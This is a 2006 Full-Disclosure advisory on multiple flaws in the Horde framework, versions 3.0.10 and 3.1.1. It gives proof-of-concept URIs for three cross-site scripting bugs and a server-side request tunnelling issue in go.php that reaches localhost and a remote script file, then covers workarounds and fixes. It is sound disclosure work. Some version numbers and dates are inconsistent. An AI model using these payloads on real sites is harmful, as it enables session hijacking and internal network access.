OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Full-disclosure] Public Advisory: Horde 3.1.1, 3.0.10 Multiple Security Issues

securitymoritz-naumann.com
Date: Wed Jul 05 2006 - 16:43:30 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SA0011

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++ Horde 3.1.1, 3.0.10 Multiple Security Issues +++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

PUBLISHED ON
  July 05, 2006

PUBLISHED AT
  http://moritz-naumann.com/adv/0011/hordemulti/0011.txt
  http://moritz-naumann.com/adv/0011/hordemulti/0011.txt.gpg

PUBLISHED BY
  Moritz Naumann IT Consulting & Services
  Hamburg, Germany
  http://moritz-naumann.com/

  SECURITY at MORITZ hyphon NAUMANN d0t COM
  GPG key: http://moritz-naumann.com/keys/0x277F060C.asc

AFFECTED APPLICATION OR SERVICE
  Horde Application Framework
  http://www.horde.org

  The Horde Framework is a common code-base used by Horde
  applications, including libraries and a common user interface.
  The best known Horde application to date is probably IMP, a webbased
  IMAP/SMTP client.

AFFECTED VERSIONS
  Version 3.0.0 up to and including 3.0.10
  Version 3.1.0 up to and including 3.1.1
  Versions below 3.0.0 have not been examined.

ISSUES
  Horde is subject to multiple security vulnerabilities, ranging from
  information disclosure to client side script injection (cross site
  scripting) issues.

  +++++ 1. Cross Site Scripting #1
  Horde is subject to a client side script injection vulnerability in
  the URL redirection (dereferrer) function.

  By accessing the following (partial) URI on a web site running an
  affected version with a web browser which is prone to this issue,
  client side script code will be injected into the output generated
  by the application:

  [Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);

  This problem is caused by insufficient validation of user supplied
  input. It is only known to be exploitable on Internet Explorer 6
  (tested on v6.2900.2180 including all patches on Windows XP SP2).
  Internet Explorer 7 beta 3 is not affected.

  +++++ 2. Cross Site Scripting #2
  Horde is subject to a client side script injection vulnerability in
  the help function.

  By accessing the following (partial) URI on a web site running a
  vulnerable version with a web browser which is prone to this issue,
  client side script code will be injected into the output generated
  by the application:

[Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E

  This problem is caused by insufficient validation of user supplied
  input. All common modern browsers providing Javascript support are
  assumed to be prone to this issue.

  +++++ 3. Cross Site Scripting #3
  Horde is subject to a client side script injection
  vulnerability in the problem reporting function.

  By accessing the following (partial) URI on a web site running a
  vulnerable version with a web browser which is prone to this issue,
  client side script code will be injected into the output generated
  by the application:

[Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22

  This problem is caused by insufficient validation of user supplied
  input. All common modern browsers providing Javascript support are
  assumed to be prone to this issue.

  +++++ 4. Cross Site Scripting #4, Web tunneling behaviour
  Horde is subject to a server side issue which allows to tunnel HTTP
  GET requests through the application and to inject remotely hosted
  web script into the output generated by the application.

  This behaviour allows for accessing arbitrary locations which are
  addressable using URIs starting with 'http://','https://' or
  'ftp://' protocol handlers. These locations will be accessible from
  within the security context of the web server running an affected
  version of the application. As a result, an attacker may be able to
  access remote locations s/he would not have otherwise access to,
  without disclosing the real source of the request [1]. Additionally,
  insufficiently access restricted local (server-side) or remote (3rd
  party) locations may become available [2].

  By tricking a victim into starting a tunnelling call to a previously
  prepared malicious HTML file, stored in a remote location, which
  contains web script which may be executed on the client side, it is
  possible to extend this into a script injection issue. The injected
  script would be executed by the client within the context of the
  domain the vulnerable web application is hosted in. [3] All common
  modern browsers providing Javascript support are assumed to be prone
  to this issue.

  By accessing the following (partial) URIs on a web site running a
  vulnerable version with a web browser, the behaviours described
  above may be triggered:

  [1]
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/
  [2]
[Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status
  [3]
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html

BACKGROUND
  Cross Site Scripting (XSS):
  Cross Site Scripting, also known as XSS or CSS, describes
  the injection of malicious content into output produced
  by a web application. A common attack vector is the
  inclusion of arbitrary client side script code into the
  applications' output. Failure to completely sanitize user
  input from malicious content can cause a web application
  to be vulnerable to Cross Site Scripting.

  http://www.owasp.org/index.php/Cross_Site_Scripting
  http://en.wikipedia.org/wiki/XSS
  http://www.cgisecurity.net/articles/xss-faq.shtml

WORKAROUNDS
  Issues 1-3:
    Client: Disable Javascript.
    Server: Prevent access to vulnerable file(s).
  Issues 1-3:
    Client: Use application as intended only.
    Server: Prevent access to vulnerable file(s).

SOLUTIONS
  The Horde project has released versions 3.1.2 and 3.1.11 today.
  These are supposed to fix all of the above issues. The updated
  packages are available at http://horde.org/

TIMELINE
  Jun 06, 2006 Issues 1-4: Discovery, code maintainer notification
  Jun 06, 2006 Issues 1-4: Code maintainer acknowledgement
  Jul 05, 2006 Issues 1-4: Code maintainer provides fix publicly
  Jul 05, 2005 Issues 1-4: Public advisory

NOTES
  This is not related to CVE-2006-2195.

REFERENCES
  Developers' release announcements
  v3.1.2: http://lists.horde.org/archives/announce/2006/000288.html
  v3.0.11: http://lists.horde.org/archives/announce/2006/000287.html

ADDITIONAL CREDIT
  N/A

LICENSE
  Creative Commons Attribution-ShareAlike License Germany
  http://creativecommons.org/licenses/by-sa/2.0/de/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFErDKBn6GkvSd/BgwRAlF7AJ4kjEsFBc2LXp4TgtxQ82OyUK4nBACfZy/U
31jDwhWrNKdtHXmsdcM1bAk=
=ENdh
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/